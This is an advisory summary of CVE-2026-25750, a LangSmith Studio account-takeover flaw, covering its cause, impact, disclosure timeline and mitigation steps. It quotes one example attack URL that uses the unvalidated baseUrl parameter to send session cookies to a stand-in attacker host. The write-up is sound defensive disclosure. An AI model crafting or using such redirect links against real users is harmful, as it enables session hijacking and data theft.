Miggo Security — LangSmith Account Takeover (CVE-2026-25750)
AI relevance: LangSmith processes ~1 billion LLM trace events daily and stores raw tool-call I/O (SQL queries, CRM records, API payloads) — an account takeover here directly exposes proprietary prompts, model configs, and the full execution history of AI agent workflows.
- CVE-2026-25750: a logged-in LangSmith user's session token could be stolen by visiting an attacker-controlled page — no credential entry required.
- Root cause was an unvalidated
baseUrlquery parameter in LangSmith Studio (/studio/?baseUrl=https://attacker.com), which redirected authenticated API requests (and cookies) to an attacker server. - LangSmith's trace storage often retains raw tool inputs/outputs for debugging, even when masking is configured — an attacker who hijacks the account can read internal SQL queries, CRM customer records, and proprietary source code.
- Successful exploitation also allowed stealing system prompts (the core IP defining agent behavior), exfiltrating tool call results, and modifying or deleting projects.
- The vulnerability was in the SaaS platform itself, meaning every authenticated user was simultaneously vulnerable until LangChain deployed a server-side fix.
- Miggo reported on December 1, 2025; LangChain patched cloud on December 15 and self-hosted on December 20.
- Because LangSmith is the default observability backend for LangChain/LangGraph deployments, the blast radius spans most enterprise LLM ops pipelines.
- The attack differs from classic phishing: the victim never sees a fake login page — their existing session cookie is silently exfiltrated.
Why it matters
AI observability platforms like LangSmith sit at a uniquely sensitive intersection: they ingest raw prompts, tool calls, model outputs, and sometimes credentials for connected data sources. An account takeover here is not just "read someone's chat logs" — it's access to the full execution trace of every AI agent workflow the organization runs. System prompts (often treated as trade secrets), internal API schemas, database queries, and customer data all flow through these traces. The baseUrl redirect class of bug is well-known in web security, but its impact is amplified enormously when the vulnerable platform is an AI ops hub processing billions of events.
What to do
- Verify patch status: If running LangSmith self-hosted, ensure you've applied the December 2025 update. Cloud users were patched automatically.
- Audit trace data: Review what raw data your LangSmith traces expose. Enable input/output masking where possible and avoid logging PII or credentials in traces.
- Rotate credentials: If you were using LangSmith during the exposure window (before December 15 for cloud), rotate API keys and audit outbound access from LangSmith-connected services.
- Restrict trace retention: Configure shorter retention policies and limit which team members can access raw trace data.
- Monitor for abuse: Check audit logs for unusual project access, exports, or configuration changes during the exposure window.